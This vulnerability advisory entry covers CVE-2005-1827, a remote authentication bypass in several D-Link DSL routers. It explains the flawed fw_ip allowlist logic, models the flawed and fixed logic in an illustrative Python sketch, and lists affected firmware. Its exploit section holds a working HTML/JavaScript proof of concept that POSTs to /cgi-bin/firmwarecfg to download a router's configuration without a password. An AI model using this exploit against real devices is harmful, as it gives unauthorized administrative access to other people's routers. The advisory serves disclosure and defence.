D-Link DSL Router Access Authentication Bypass Vulnerability

Vulnerability ID: 1108794
Vulnerability type: Access validation error
Published: 2005-05-19
Updated: 2005-10-20
CVE ID: CVE-2005-1827
CNNVD-ID: CNNVD-200505-1215
Platform: Hardware
CVSS score: 7.5
|Vulnerability source
https://www.exploit-db.com/exploits/25684
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200505-1215
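|Vulnerability details
D-Link DSL routers are commonly used in homes and small offices. These routers have a flaw in how they authenticate user access, which a remote attacker may exploit to gain unauthorized access to the device. When the CGI /cgi-bin/firmwarecfg is executed, the script checks whether a file named fw_ip exists in /var/tmp/. If the file exists, every IP address listed in it is allowed to access the device directly without authentication. If the file does not exist, the CGI creates a new file and writes the requesting address into it.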
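The trust-on-first-request logic described above, modelled next to a corrected form. This is an added example, not D-Link firmware code (which this page does not show). The one-address-per-line file format, the function names and the `session_authenticated` flag are assumptions, and the IP addresses are constructed documentation addresses.

```python
import os
import tempfile

# Model of the allowlist file the advisory calls /var/tmp/fw_ip.
# The one-address-per-line format is an assumption for illustration.

def _read_allowlist(path):
    if not os.path.exists(path):
        return None
    with open(path) as fh:
        return {line.strip() for line in fh if line.strip()}

def flawed_check(path, client_ip):
    """Behaviour as described: a missing file is created with the caller's address."""
    allowed = _read_allowlist(path)
    if allowed is None:
        with open(path, "w") as fh:
            fh.write(client_ip + "\n")   # first caller enrols itself
        return True
    return client_ip in allowed          # listed addresses skip authentication

def hardened_check(path, client_ip, session_authenticated):
    """Hypothetical fix: the file never substitutes for authentication."""
    if not session_authenticated:
        return False                     # no session: no access and no file write
    allowed = _read_allowlist(path) or set()
    if client_ip not in allowed:
        with open(path, "a") as fh:
            fh.write(client_ip + "\n")   # record the address only after a real login
    return True

def demo():
    """Replay constructed requests against both models; return the decisions."""
    with tempfile.TemporaryDirectory() as tmp:
        flawed = os.path.join(tmp, "fw_ip_flawed")
        fixed = os.path.join(tmp, "fw_ip_fixed")
        return {
            "flawed_first_unauth": flawed_check(flawed, "203.0.113.7"),
            "flawed_same_ip_again": flawed_check(flawed, "203.0.113.7"),
            "flawed_other_ip": flawed_check(flawed, "198.51.100.9"),
            "fixed_unauth": hardened_check(fixed, "203.0.113.7", False),
            "fixed_file_created": os.path.exists(fixed),
            "fixed_after_login": hardened_check(fixed, "192.0.2.10", True),
        }

if __name__ == "__main__":
    for name, decision in demo().items():
        print(f"{name}: {decision}")
```

In the flawed model the access decision depends on who reaches the CGI first while the file is absent; in the corrected model the decision depends only on the authenticated session.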
|Exploit
source: http://www.securityfocus.com/bid/13679/info

Various D-Link DSL routers are susceptible to a remote authentication bypass vulnerability. This issue is due to a failure of the devices to require authentication in certain circumstances.

This vulnerability allows remote attackers to gain complete administrative access to affected devices.

Various D-Link devices with the following firmware revisions are affected by this issue:
- V1.00B01T16.EN.20040211
- V1.00B01T16.EU.20040217
- V0.00B01T04.UK.20040220
- V1.00B01T16.EN.20040226
- V1.00B02T02.EU.20040610
- V1.00B02T02.UK.20040618
- V1.00B02T02.EU.20040729
- V1.00B02T02.DE.20040813
- V1.00B02T02.RU.20041014

Due to the common practice of code reuse, other devices are also likely affected by this issue. 

<html><head>Download config.xml:<title>GetConfig - Config file
download</title></head><body>

<script lang="javascript">
function invia_richiesta()
{
document.DownloadConfig.action='http://'+document.InputBox.Host.value+'/cgi-bin/firmwarecfg';
document.DownloadConfig.submit();
}
</script>

<form name="InputBox">
<br>http://<input Name="Host" type="text" value="">/cgi-bin/firmwarecfg<br>
</form>
<form name="DownloadConfig" method="POST" action=""
enctype="multipart/form-data">
<input type="Submit" name="config" value="Download"
onClick="javascript:invia_richiesta();"><br>
</form></body></html>
|References

Source: BUGTRAQ
Name: 20050526 DSL-504T (and maybe many other) remote access without password bug
Link: http://marc.theaimsgroup.com/?l=bugtraq&m=111722515805478&w=2
Source: BID
Name: 13679
Link: http://www.securityfocus.com/bid/13679
Source: SECUNIA
Name: 15422
Link: http://secunia.com/advisories/15422
